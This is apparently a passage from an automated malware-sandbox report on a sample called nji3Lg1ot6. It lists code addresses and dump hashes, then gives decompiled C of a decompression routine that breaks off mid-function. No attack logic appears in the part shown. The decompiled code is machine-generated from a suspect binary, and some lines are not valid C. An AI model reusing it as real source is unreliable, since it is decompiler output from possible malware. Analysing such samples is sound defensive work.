                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x00000000
                      0x004060d9
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x004060bc
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x00000000
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x00000000
                      0x00000000
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x00000000
                      0x00000000
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x00000000
                      0x00406424
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00000000
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x004068d2
                      0x004068d8
                      0x004068da
                      0x004068e1
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                      • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                      • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                      • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004062EB, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
